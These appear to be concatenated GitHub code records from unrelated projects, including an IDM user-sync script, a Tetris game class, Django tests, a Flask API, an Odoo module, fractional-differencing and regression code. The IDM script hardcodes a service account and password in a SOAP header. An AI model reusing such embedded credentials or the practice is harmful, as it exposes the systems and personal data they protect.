datetime.today().strftime('%Y%m%d%H%M%S%f')[:-3]\n idmid = 'AD_SUNAC_300_' + timestr\n\n WSDL_URL = \"http://esb.sunac.com.cn:8002/WP_SUNAC/APP_PUBLIC_SERVICES/Proxy_Services/TA_IDM\" \\\n \"/PUBLIC_SUNAC_300_queryIdmUserData_PS?wsdl\"\n SYSTEMID = 'Sunac_ADLS_USR'\n NUM = 1\n NUM_LOOP = 'YES'\n\n object_max_dbtime = UserExpire.objects.aggregate(Max('updatetime'))\n begintime = datetime.strftime(object_max_dbtime['updatetime__max'], '%Y-%m-%d %H:%M:%S.%f')\n\n while NUM <= 999 and NUM_LOOP == 'YES':\n client = Client(wsdl=WSDL_URL)\n querydto_type = client.get_type('ns0:queryDto')\n header_type = client.get_type('ns2:Header')\n querydto = querydto_type(beginDate=begintime, endDate=CURRENT_DATE,\n pageNo=NUM, pageRowNo='100', systemID=SYSTEMID)\n header = header_type(BIZTRANSACTIONID=idmid, COUNT='', CONSUMER='',\n SRVLEVEL='', ACCOUNT='idmadmin', PASSWORD='idmpass')\n residmquery = client.service.PUBLIC_SUNAC_300_queryIdmUserData(queryDto=querydto,\n _soapheaders={'parameters2': header})\n\n if residmquery['body']['HEADER']['RESULT'] == '0':\n user_list_old = residmquery['body']['LIST']\n user_list = user_list_old.replace(\"&\", \"及\")\n xml_tree = Et.fromstring(user_list)\n if len(xml_tree) > 0:\n l_userinfo = []\n for userinfo in xml_tree.iter('USER'):\n userid = userinfo.find('UserLogin').text\n username = userinfo.find('Username').text\n company = userinfo.find('UserAddress').text\n phone = userinfo.find('Mobile').text\n email = userinfo.find('Email').text\n state = userinfo.find('UserStatus').text\n expiretime = userinfo.find('UserExpiryDate').text\n updatetime = userinfo.find('UserUpdate').text\n createtime = userinfo.find('UserCreate').text\n usertype = userinfo.find('UserEmpType').text\n t_userobj = (userid, username, company, phone, email, state, expiretime, updatetime, createtime,\n usertype)\n l_userinfo.append(t_userobj)\n dbconn.dbmanyinsert('replace into overview_userexpire (userid,username,company,phone,email,state,'\n 'expiretime,updatetime,createtime,usertype) '\n 'values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)',\n l_userinfo)\n\n if len(xml_tree) == 100:\n NUM += 1\n else:\n NUM_LOOP = 'NO'\n else:\n NUM_LOOP = 'NO'\n else:\n NUM_LOOP = 'NO'\n\n dbconn.dbclose()\n","repo_name":"huyu16/SunacProject","sub_path":"itportal/data/idm.py","file_name":"idm.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26172055590","text":"import random\nfrom settings import *\nfrom block import Block\nfrom gamewall import Wall\nimport pygame\n\n\nclass GameState:\n def __init__(self, screen):\n self.screen = screen\n self.wall = Wall(screen)\n self.block = None\n self.next_block = None\n self.timer_interval = TIMER_INTERVAL\n # self.set_timer(self.timer_interval)\n self.game_score = 0\n self.stopped = True\n self.paused = False\n self.play_times = 0\n self.level = 1\n\n def set_timer(self, timer_interval):\n pygame.time.set_timer(pygame.USEREVENT, timer_interval)\n\n def stop_timer(self):\n pygame.time.set_timer(pygame.USEREVENT, 0) # clear timer\n\n def add_score(self, score):\n self.game_score += score\n level = self.game_score // LEVEL_RANGE + 1\n if level > self.level:\n self.level += 1\n if self.timer_interval >= 500:\n self.timer_interval -= 50\n elif 200 <= self.timer_interval < 500:\n self.timer_interval -= 30\n elif 100 <= self.timer_interval < 200:\n self.timer_interval -= 20\n elif 0 < self.timer_interval < 100:\n self.timer_interval -= 10\n pygame.time.set_timer(pygame.USEREVENT, self.timer_interval)\n\n def start_game(self):\n self.stopped = False\n self.set_timer(TIMER_INTERVAL)\n self.timer_interval = TIMER_INTERVAL\n self.block = self.new_block()\n self.block = self.new_block()\n self.play_times += 1\n self.wall.clear()\n self.game_score = 0\n self.paused = False\n # random.seed(int(time.time()))\n\n def new_block(self):\n self.block = self.next_block\n a = random.choice(BLOCK_TYPES)\n self.next_block = Block(a, random.randint(0, len(BLOCK[a]) - 1), self.screen, self.wall)\n\n return self.block\n\n def pause_game(self):\n self.stop_timer()\n self.paused = True\n\n def resume_game(self):\n self.set_timer(self.timer_interval)\n self.paused = False\n\n def touch_bottom(self):\n self.wall.add_to_wall(self.block)\n self.add_score(self.wall.eliminate_line())\n for c in range(COLUMN_NUM):\n if self.wall.is_wall(0, c): # game over\n self.stopped = True\n break\n if not self.stopped:\n self.block = self.new_block()\n if self.block.hit_wall():\n self.stopped = True\n if self.stopped:\n self.stop_timer()\n","repo_name":"tonyqtang/ee551project","sub_path":"gamestate.py","file_name":"gamestate.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40116741363","text":"# スペース区切りの2つの整数と、文字列が入力されます。2つの整数の範囲の部分文字列を、大文字にして出力してください。\n\na, b = map(int, input().split())\ns = input()\n\ncount = 0\nstr = []\nfor i in s:\n count += 1\n if count > a-1 and count < b+1:\n str.append(i.upper())\n else:\n str.append(i)\n\nprint(\"\".join(str))","repo_name":"kanp7/paiza","sub_path":"Python/rankB_Up/CapitalizeOnlyTheSpecifiedRange/Final.py","file_name":"Final.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40297888655","text":"def sorting():\n sorted_list = []\n while True:\n sorted_list.append(min(numbers))\n numbers.remove(min(numbers))\n if len(numbers) == 0:\n break\n print('sorted list')\n print(sorted_list)\n\nnum = input('enter a sequence of number, separated by space: ')\n\n#strip: cut spaces at start/end of string\nlist_num = num.strip().split()\n\nnumbers = []\n\nfor item in list_num:\n numbers.append(int(item))\nprint(numbers)\n\nis_sorted = True\nfor i in range(len(numbers) - 1):\n if numbers[i] > numbers[i + 1]:\n is_sorted = False\n break\nif is_sorted:\n print('your list is already sorted')\nelse:\n print('your list is not sorted')\n sorting()\n","repo_name":"minhduc9699/PhamMinhDuc-fundamental-c4e16","sub_path":"S4/input_numbers.py","file_name":"input_numbers.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71495935602","text":"#!/usr/bin/python3\n\"\"\"Defining class\"\"\"\n\n\nclass Square:\n \"\"\"a square class\"\"\"\n\n def __init__(self, size=0):\n \"\"\"Initialize a new square.\n Args:\n size (int): The size of the new square.\n \"\"\"\n if not isinstance(size, int):\n raise TypeError(\"size must be an integer\")\n elif size < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = size\n\n def area(self):\n \"\"\"Returns area of a square\"\"\"\n return self.__size**2\n\n @property\n def size(self):\n \"\"\"getter function\"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n \"\"\"setter function\n Args:\n value(int): takes in the size field\n \"\"\"\n if not isinstance(value, int):\n raise TypeError(\"size must be an integer\")\n elif value < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = value\n\n def my_print(self):\n \"\"\"prints the square\"\"\"\n if self.size != 0:\n for i in range(0, self.size):\n print(\"#\" * self.size)\n else:\n print()\n","repo_name":"Omoseke-code/alx-higher_level_programming","sub_path":"0x06-python-classes/5-square.py","file_name":"5-square.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"38247309569","text":"# 수학/연속인가? ?/실버5\n\nk = int(input())\na, b, c, d = list(map(int, input().split()))\ntmp1, tmp2 = a*k+b, c*k+d\n\nif tmp1 == tmp2:\n print(\"Yes\",tmp1)\nelse:\n print(\"No\")\n","repo_name":"coolOlive/TIL","sub_path":"코딩테스트 공부/230819_백준[26517].py","file_name":"230819_백준[26517].py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13147845083","text":"from django.test import TestCase\nfrom .models import Product, Category\n\n\nclass TestProductsModels(TestCase):\n \"\"\" tests for the product model \"\"\"\n def setUp(self):\n self.category1 = Category.objects.create(\n name='tin_food',\n friendly_name='Canned Food'\n )\n self.category2 = Category.objects.create(\n name='dry_food',\n friendly_name='Dry Food'\n )\n self.product1 = Product.objects.create(\n name='Test 1234',\n category=self.category1,\n quantity_in_stock=5,\n price=15.00,\n )\n\n def test_product_name(self):\n product = self.product1\n self.assertEqual(str(product), 'Test 1234')\n\n def test_stock_label_change(self):\n product = self.product1\n product.quantity_in_stock = 0\n self.assertEqual(product.in_stock, False)\n\n def test_category_name(self):\n category = self.category1\n self.assertEqual(str(category), 'tin_food')\n\n def test_category_name_to_display(self):\n category = self.category1\n friendly_name = category.get_friendly_name()\n self.assertEqual(friendly_name, 'Canned Food')\n","repo_name":"ExcellentWish/fur-pet-store","sub_path":"products/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41020627094","text":"import numpy as np\nimport os\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom graphviz import Source\nfrom sklearn.tree import export_graphviz\nfrom sklearn.datasets import load_iris\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nimport subprocess\n\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Figures settings\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"decision_trees\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\n# Writting console output into a file.\nfnres = 'consoleResultsIris.txt'\nfres = open(fnres, 'w')\n\n\n# Function to create the png of the plots\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\n\n# Function to make the plot of the decision bundary\ndef plot_decision_boundary(clf, X, y, axes=[0, 7.5, 0, 3], iris=True, legend=False,\n plot_training=True):\n x1s = np.linspace(axes[0], axes[1], 100)\n x2s = np.linspace(axes[2], axes[3], 100)\n x1, x2 = np.meshgrid(x1s, x2s)\n X_new = np.c_[x1.ravel(), x2.ravel()]\n y_pred = clf.predict(X_new).reshape(x1.shape)\n custom_cmap = ListedColormap(['#fafab0', '#9898ff', '#a0faa0'])\n plt.contourf(x1, x2, y_pred, alpha=0.3, cmap=custom_cmap)\n if not iris:\n custom_cmap2 = ListedColormap(['#7d7d58', '#4c4c7f', '#507d50'])\n plt.contour(x1, x2, y_pred, cmap=custom_cmap2, alpha=0.8)\n if plot_training:\n plt.plot(X[:, 0][y == 0], X[:, 1][y == 0], \"yo\", label=\"Iris setosa\")\n plt.plot(X[:, 0][y == 1], X[:, 1][y == 1],\n \"bs\", label=\"Iris versicolor\")\n plt.plot(X[:, 0][y == 2], X[:, 1][y == 2],\n \"g^\", label=\"Iris virginica\")\n plt.axis(axes)\n if iris:\n plt.xlabel(\"Petal length\", fontsize=14)\n plt.ylabel(\"Petal width\", fontsize=14)\n else:\n plt.xlabel(r\"$x_1$\", fontsize=18)\n plt.ylabel(r\"$x_2$\", fontsize=18, rotation=0)\n if legend:\n plt.legend(loc=\"lower right\", fontsize=14)\n\n\n# Load the iris dataset\niris = load_iris()\nX = iris.data[:, :2]\ny = iris.target\nx_train, x_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, train_size=0.8, random_state=1, shuffle=True)\ntree_clf = DecisionTreeClassifier(random_state=0)\n\n# Train the model\ntree_clf.fit(x_train, y_train)\n\n\n# Create the graphviz dot file for the wine dataset\nexport_graphviz(tree_clf, out_file=os.path.join(IMAGES_PATH, \"iris_tree.dot\"),\n feature_names=iris.feature_names[2:], class_names=iris.target_names, rounded=True, filled=True)\nSource.from_file(os.path.join(IMAGES_PATH, \"iris_tree.dot\"))\n\n# Create the tree png\ntreepng = \"iris_tree.png\"\ncmd = [\"dot\", \"-Tpng\", os.path.join(IMAGES_PATH, \"iris_tree.dot\"),\n \"-o\", os.path.join(IMAGES_PATH, treepng)]\np = subprocess.Popen(cmd)\n\n# Print results and write them to external file\nprint(\"==============TESTING IRIS DATASET===============\\n\")\nfres.write(\"==============TESTING IRIS DATASET===============\\n\")\ntestset_score = tree_clf.score(x_test, y_test)\nprint(\"The score obtained by the test sets is: {scr}\".format(\n scr=testset_score))\nfres.write(\"The score obtained by the test sets is: {scr}\\n\".format(\n scr=testset_score))\ntrainset_score = tree_clf.score(x_train, y_train)\nprint(\"The score obtained by the train sets is: {scr}\".format(\n scr=trainset_score))\nfres.write(\"The score obtained by the train sets is: {scr}\\n\".format(\n scr=trainset_score))\n\n# Plot the irises\nplt.figure(figsize=(8, 4))\nplot_decision_boundary(tree_clf, X, y)\nplt.plot([2.45, 2.45], [0, 3], \"k-\", linewidth=2)\nplt.plot([2.45, 7.5], [1.75, 1.75], \"k--\", linewidth=2)\nplt.text(1.40, 1.0, \"Depth=0\", fontsize=15)\nplt.text(3.2, 1.80, \"Depth=1\", fontsize=13)\nsave_fig(\"decision_tree_decision_boundaries_plot\")\nplt.show()\n\nfres.close()\n","repo_name":"dmtzt/machine-learning","sub_path":"practice5/practice5-iris.py","file_name":"practice5-iris.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32589074799","text":"from matplotlib import pyplot as plt\nimport pandas as pd\nimport matplotlib.animation as animation\nfrom matplotlib import style\nimport subprocess\nimport sys\n\ndef draw_error (epoches, loss):\n plt.plot(epoches, loss)\n plt.xlabel(\"epoches\")\n plt.ylabel(\"loss\")\n plt.show()\n\ndef draw_error_animation (): \n style.use('fivethirtyeight')\n fig = plt.figure()\n global ax1 \n ax1 = fig.add_subplot(1,1,1)\n ani = animation.FuncAnimation(fig, animate, interval=1000)\n plt.show()\n\ndef animate(i):\n graph_data = open('example.txt','r+').read()\n lines = graph_data.split('\\n')\n xs = []\n ys = []\n for line in lines:\n if len(line) > 1:\n x, y = line.split(',')\n xs.append(float(x))\n ys.append(float(y))\n ax1.clear()\n ax1.plot(xs, ys)\n\nsubprocess.Popen([\"python\", \"test_mlp.py\"] + sys.argv[1:])\ndraw_error_animation()","repo_name":"EslamAsfour/PyEZNet","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"22939167857","text":"from flask import Flask, request\nimport pandas as pd\n\ndf = pd.read_csv('./data/services2019.csv')\n\napp = Flask(__name__)\n\n@app.route('/', methods=[\"GET\"])\ndef home():\n return 'this is an API service for MN ICD code details'\n\n@app.route('/preview', methods=[\"GET\"])\ndef preview():\n top10rows = df.head(10)\n result = top10rows.to_json(orient=\"records\")\n return result\n \n@app.route('/icd/', methods=['GET'])\ndef icdcode(value):\n print('value: ', value)\n filtered = df[df['svc_code_ctg'] == value]\n return filtered.to_json(orient=\"records\")\n\n\n\nif __name__ =='__main__':\n app.run(debug=True)","repo_name":"Alexandriaotuare/Vercel-assignment","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31175689622","text":"from odoo import models, fields, api, _\n\nclass PurchaseOrder(models.Model):\n\n _inherit = 'purchase.order'\n\n @api.onchange('is_products')\n def _onchange_select_all_products(self):\n if self.is_products:\n self.purchase_out_lines = self.order_line.filtered(lambda line: line.product_id)\n\n # @api.model\n # def create(self, vals):\n # if vals.get('job_order_seq', _('New')) == _('New'):\n # vals['job_order_seq'] = self.env['ir.sequence'].next_by_code('hospital.job.order.sequence') or _('New')\n # result = super(JobOrder, self).create(vals)\n # return result\n\n @api.multi\n def name_get(self):\n res = []\n for field in self:\n res.append((field.id, '%s' % field.job_order_seq))\n return res\n\n job_order_seq = fields.Char(string='Job Order Id', required=True, copy=False,\n readonly=True, index=True, default=lambda self: _('New'))\n order_type = fields.Selection([\n ('J', 'Job Order'),\n ('P', 'Purchase Order')\n ], default='J', string=\"Order Type\")\n is_products = fields.Boolean(string=\"Some Item to be received\")\n purchase_out_lines = fields.One2many('purchase.order.line', 'purchase_out_id', string=\"Purchase Out Lines\")\n have_invoice = fields.Boolean(string=\"Have Invoice\")\n invoice_date = fields.Date(string=\"Invoice Date\")\n invoice_number = fields.Text(string=\"Invoice Number\")\n\n\n@api.model\ndef create(self, vals):\n if vals.get('name', 'New') == 'New':\n if vals.get('job_order_seq') == True:\n vals['name'] = self.env['ir.sequence'].next_by_code('hospital.job.order.sequence') or _('New')\n else:\n vals['name'] = self.env['ir.sequence'].next_by_code('purchase.order') or '/'\n return super(PurchaseOrder, self).create(vals)\n\n\nclass PurchaseOrderLineInherit(models.Model):\n _inherit = 'purchase.order.line'\n\n @api.model\n def create(self, vals):\n if 'order_id' not in vals:\n vals['order_id'] = self._context.get('order_id')\n return super(PurchaseOrderLineInherit, self).create(vals)\n\n @api.onchange('product_id')\n def _onchange_product_id(self):\n return {'domain': {'product_id': [('type', 'in', ('product', 'service'))]}}\n\n purchase_out_id = fields.Many2one('purchase.order', string=\"Purchase Out\")\n order_id = fields.Many2one('purchase.order', string='Purchase Order', required=True, ondelete='cascade')","repo_name":"KasimPythonCodes/odoo_setup_code","sub_path":"addons/om_hospital/models/purchase_order.py","file_name":"purchase_order.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29585684568","text":"import pandas as pd\nimport numpy as np\n\ndef get_weights(d, size):\n w = [1.]\n for k in range(1, size):\n w_ = -w[-1]/k*(d-k+1)\n w.append(w_)\n w = np.array(w[::-1]).reshape(-1, 1)\n return w\n\ndef frac_diff(series, d, thres=.01):\n '''\n Increasing width window, with treatment of NaNs\n Note 1: For thres=1, nothing is skipped.\n Note 2: d can be any positive fractional, not necessarily bounded [0,1].\n '''\n # 1) compute weights for the longest series\n w = get_weights(d, series.shape[0])\n # 2) determine initial calcs to be skipped based on weight-loss threshold\n w_ = np.cumsum(abs(w))\n w_ /= w_[-1]\n skip = w_[w_>thres].shape[0]\n # 3) apply weights to values\n df = {}\n for name in series.columns:\n series_f = series[[name]].fillna(method='ffill').dropna()\n df_ = pd.Series()\n for iloc in range(skip, series_f.shape[0]):\n loc = series_f.index[iloc]\n if not np.isfinite(series.loc[loc, name]):\n continue # exclude NaNs\n df_[loc] = np.dot(w[-(iloc+1):, :].T, series_f.loc[:loc])[0, ]\n df[name] = df_.copy(deep=True)\n df = pd.concat(df, axis=1)\n return df\n\ndef frac_diff_fast(series, d):\n # from: https://github.com/philipperemy/fractional-differentiation-time-series/blob/master/fracdiff/fracdiff.py\n df = {}\n for name in series.columns:\n series_f = series[[name]].fillna(method='ffill').dropna()\n x = series_f.values\n T = len(x)\n np2 = int(2 ** np.ceil(np.log2(2 * T - 1)))\n k = np.arange(1, T)\n b = np.append([1], np.cumprod((k - d - 1) / k))\n z = np.zeros(np2 - T)\n z1 = np.append(b, z)\n z2 = np.append(x, z)\n dx = np.fft.ifft(np.fft.fft(z1) * np.fft.fft(z2))\n dx = np.real(dx[0:T])\n df[name] = pd.Series(dx, index=series_f.index)\n df = pd.concat(df, axis=1)\n return df\n","repo_name":"jfuechsl/fml_fast","sub_path":"fracdiff/expanding.py","file_name":"expanding.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74238229041","text":"# Вычислить число c заданной точностью d\n\n# Пример:\n\n# - при $d = 0.001, π = 3.141.$ $10^{-1} ≤ d ≤10^{-10}$\n\n\n# Формула Бэйли — Боруэйна — Плаффа\n# пи = сумм(1/16^n*(4/(8*n+1)- 2/(8*n+4) - 1/(8*n +5) - 1/(8*n +6)))\n\n\n\n\ndef f(n):\n return (1 / 16 ** n) * ((4 / (8 * n + 1)) - (2 / (8 * n + 4)) - (1 / (8 * n + 5)) - (1/ (8 * n + 6)))\n\ndef round_up(number: int, accuracy: float) -> float:\n accuracy = len(accuracy.split('.')[1])\n divider = 1\n for i in range(accuracy):\n divider *= 10\n\n return number * divider // 1 / divider\n \n\naccuracy = input(\"Введите необходимую точность: \").replace(\",\", \".\")\nn = 0\nresult = 0\nswitch = True\nwhile switch:\n \n if (f(n - 1) - f(n)) > float(accuracy):\n result += f(n)\n n += 1\n else:\n switch = False\n\n\nprint(round_up(result, accuracy))\n","repo_name":"bannik-git/python_lesson","sub_path":"Homework/Seminar_4/001_calculation_accuracy.py","file_name":"001_calculation_accuracy.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"30618364736","text":"import re\n\nfrom ming.odm import ThreadLocalODMSession\nfrom pylons import app_globals as g\n\nfrom vulcanforge.artifact.model import ArtifactReference, Shortlink\nfrom vulcanforge.discussion.model import Discussion\nfrom vulcanforge.project.model import AppConfig\n\n\ndef remove_deprecated_ac(ac):\n g.solr.delete(q='app_config_id_s:\"{}\"'.format(ac._id))\n d_cur = Discussion.query.find({\"app_config_id\": ac._id})\n for d in d_cur:\n d.delete()\n ArtifactReference.query.remove({\n 'artifact_reference.app_config_id': ac._id})\n Shortlink.query.remove({'app_config_id': ac._id})\n ac.delete()\n ThreadLocalODMSession.flush_all()\n\n\ndef remove_all_deprecated():\n cur = AppConfig.query.find({\n 'tool_name': {\n \"$nin\": [re.compile(ep, re.I) for ep in g.tool_manager.tools]\n }\n })\n for ac in cur:\n remove_deprecated_ac(ac)\n\n\nif __name__ == '__main__':\n remove_all_deprecated()\n","repo_name":"vulcan-collaboration/vulcanforge","sub_path":"scripts/remove_deprecated_apps.py","file_name":"remove_deprecated_apps.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"75187614323","text":"\"\"\"\nRuns regressions of model results on individual characteristics\n\"\"\"\nimport estimagic.visualization.estimation_table as et\nimport pandas as pd\nimport pytask\nimport statsmodels.formula.api as smf\n\nfrom ambig_beliefs.final.utils_final import col_name_to_proper_name\nfrom ambig_beliefs.final.utils_final import put_reg_sample_together\nfrom ambig_beliefs.final.utils_final import variable_to_proper_name\nfrom config import BASIC_CONTROLS\nfrom config import MODEL_SPECS\nfrom config import NAMES_INDICES_SPEC\nfrom config import NAMES_MAIN_SPEC\nfrom config import NAMES_ROBUSTNESS_SPEC\nfrom config import OUT_ANALYSIS\nfrom config import OUT_DATA\nfrom config import OUT_DATA_LISS\nfrom config import OUT_TABLES\nfrom config import OUT_UNDER_GIT\n\n\ndef make_formula(y, X):\n regs = \" + \".join(X)\n return f\"{y} ~ {regs}\"\n\n\ndef make_mnlogit_table(\n mod,\n):\n params = mod.params\n se = mod.bse\n k = mod.params.shape[1] + 1\n\n table = pd.DataFrame(\n index=range(params.index.shape[0] * 2 + 2),\n columns=[\"variable\"] + [f\"Group 0 v Group {g+1}\" for g in range(k - 1)],\n )\n for i, v in enumerate(params.index):\n i_coef = i * 2\n i_se = i_coef + 1\n table.iloc[i_coef, 0] = v\n table.iloc[i_se, 0] = \"\"\n\n for j in range(k - 1):\n table.iloc[i_coef, j + 1] = f\"{params.iloc[i, j]:.2f}\"\n table.iloc[i_se, j + 1] = f\"({se.iloc[i, j]:.2f})\"\n\n for j in range(k - 1):\n table.iloc[-1, j + 1] = f\"{mod.prsquared:.2f}\"\n table.iloc[-2, j + 1] = mod.nobs\n\n table.iloc[-1, 0] = \"Pseudo $R^2$\"\n table.iloc[-2, 0] = \"N\"\n table.set_index(\"variable\", inplace=True)\n table.index.name = \"\"\n return table\n\n\ndef reg_para_on_ind_chars(df, params, controls, cluster_var, path_out):\n df = df.copy().reset_index()\n col_name_to_proper_name = {\n \"ambig_av\": r\"$\\alpha^{AEX}$\",\n \"ambig_av_index\": r\"$\\alpha^{AEX}_\\text{BBLW-Index}$\",\n \"ll_insen\": r\"$\\ell^{AEX}$\",\n \"ll_insen_index\": r\"$\\ell^{AEX}_\\text{BBLW-Index}$\",\n \"theta\": r\"$\\sigma^{AEX}$\",\n }\n\n # Make regression table that also includes columns on subset\n def run_one_reg(y, sel, models):\n f = make_formula(y=y, X=controls)\n if cluster_var:\n mod = smf.ols(formula=f, data=sel).fit(\n cov_type=\"cluster\", cov_kwds={\"groups\": sel[cluster_var]}\n )\n else:\n mod = smf.ols(formula=f, data=sel).fit(cov_type=\"HC3\")\n models.append(mod)\n return models\n\n models = []\n for para in params:\n models = run_one_reg(para, df, models)\n\n # for para in params:\n # # duplicate dependent variable to avoid estimagic error: \"If there are\n # # repetitions in model_names, models with the same name need to be\n # # adjacent.\"\n # df[f\"{para}_1\"] = df[para]\n # models = run_one_reg(f\"{para}_1\", df.query(\"all_indices_valid\"), models)\n\n # for para in params:\n # # duplicate dependent variable to avoid estimagic error: \"If there are\n # # repetitions in model_names, models with the same name need to be\n # # adjacent.\"\n # df[f\"{para}_2\"] = df[para]\n # models = run_one_reg(\n # f\"{para}_2\",\n # df.query(\"at_least_2_waves_with_valid_choice_and_index\"),\n # models,\n # )\n\n out = et.estimation_table(\n models,\n return_type=\"render_inputs\",\n add_trailing_zeros=False,\n siunitx_warning=False,\n custom_param_names=variable_to_proper_name,\n custom_col_names={\n **col_name_to_proper_name,\n # **\n },\n # custom_col_groups=[\"Full Sample\"] * len(params)\n # + [\"All BBLW-indices valid\"] * len(params)\n # + [\"At least two waves with valid BBLW-indices\"] * len(params),\n number_format=(\"{0:.2g}\", \"{0:.4f}\", \"{0:.4g}\"),\n stats_options={\n \"n_obs\": \"Observations\",\n \"rsquared_adj\": \"Adj. R$^2$\",\n \"show_dof\": None,\n },\n )\n\n col_renaming = {\n **{f\"{para}_1\": col_name_to_proper_name[para] for para in params},\n **{f\"{para}_2\": col_name_to_proper_name[para] for para in params},\n }\n out[\"body\"] = out[\"body\"].rename(columns=col_renaming)\n out[\"footer\"] = out[\"footer\"].rename(columns=col_renaming)\n out_latex = et.render_latex(\n out[\"body\"],\n out[\"footer\"],\n append_notes=False,\n show_footer=True,\n siunitx_warning=False,\n escape_special_characters=False,\n )\n with open(path_out, \"w\") as my_table:\n my_table.write(out_latex)\n\n\ndef reg_risk_numeracy_on_controls(df, path_out):\n risk_num_controls = [c for c in BASIC_CONTROLS if \"risk\" in c or \"numeracy\" in c]\n non_risk_num_controls = [c for c in BASIC_CONTROLS if c not in risk_num_controls]\n models = []\n for y in risk_num_controls:\n f = make_formula(y=y, X=non_risk_num_controls)\n mod = smf.ols(formula=f, data=df).fit(cov_type=\"HC3\")\n models.append(mod)\n\n out = et.estimation_table(\n models,\n return_type=\"latex\",\n add_trailing_zeros=False,\n siunitx_warning=False,\n custom_param_names=variable_to_proper_name,\n custom_col_names=col_name_to_proper_name,\n number_format=(\"{0:.2g}\", \"{0:.4f}\", \"{0:.4g}\"),\n stats_options={\n \"n_obs\": \"Observations\",\n \"rsquared_adj\": \"Adj. R$^2$\",\n \"show_dof\": None,\n },\n escape_special_characters=False,\n )\n with open(path_out, \"w\") as my_table:\n my_table.write(out)\n\n\nPARAMETRIZATION = {}\nfor m in NAMES_MAIN_SPEC + NAMES_ROBUSTNESS_SPEC + NAMES_INDICES_SPEC:\n depends_on = {\n \"individual\": OUT_DATA / \"individual.pickle\",\n \"sample_restrictions\": OUT_DATA / \"sample_restrictions.pickle\",\n \"indices\": OUT_DATA_LISS / \"ambiguous_beliefs\" / \"indices.pickle\",\n \"utils_final\": \"utils_final.py\",\n \"group_assignments\": OUT_ANALYSIS / f\"group_assignments_{m}.pickle\",\n \"group_stats\": OUT_ANALYSIS / f\"group_stats_{m}.pickle\",\n \"pat_rec_and_dur_restrictions\": OUT_DATA\n / \"pat_rec_and_dur_restrictions.pickle\",\n }\n if not MODEL_SPECS[m][\"indices_params\"]:\n depends_on[MODEL_SPECS[m][\"est_model_name\"]] = (\n OUT_UNDER_GIT\n / MODEL_SPECS[m][\"est_model_name\"]\n / \"opt_diff_evolution\"\n / \"results.pickle\"\n )\n produces = {\n \"model_comp_on_chars\": OUT_TABLES\n / m\n / (\"model_comp_on_chars\" + MODEL_SPECS[m][\"asset_calc\"] + \".tex\"),\n \"additional_vars_on_chars\": OUT_TABLES\n / m\n / (\"additional_vars_on_chars\" + \".tex\"),\n }\n PARAMETRIZATION[m] = {\n \"depends_on\": depends_on,\n \"produces\": produces,\n \"model_spec\": MODEL_SPECS[m],\n }\n\nfor m, kwargs in PARAMETRIZATION.items():\n\n @pytask.mark.task(id=m)\n def task_reg_model_comps_on_ind_chars(\n depends_on=kwargs[\"depends_on\"],\n produces=kwargs[\"produces\"],\n model_spec=kwargs[\"model_spec\"],\n ):\n models = (\n model_spec[\"wbw_models\"]\n if model_spec[\"indices_params\"]\n else [model_spec[\"est_model_name\"]]\n )\n df = put_reg_sample_together(\n in_path_dict=depends_on,\n asset_calc=model_spec[\"asset_calc\"],\n restrictions=model_spec[\"restrictions\"],\n models=models,\n indices=model_spec[\"indices_params\"],\n indices_mean=model_spec.get(\"indices_mean\"),\n )\n\n controls = BASIC_CONTROLS\n if model_spec[\"indices_params\"]:\n params = [\"ambig_av\", \"ll_insen\"]\n else:\n params = [\"ambig_av\", \"ll_insen\", 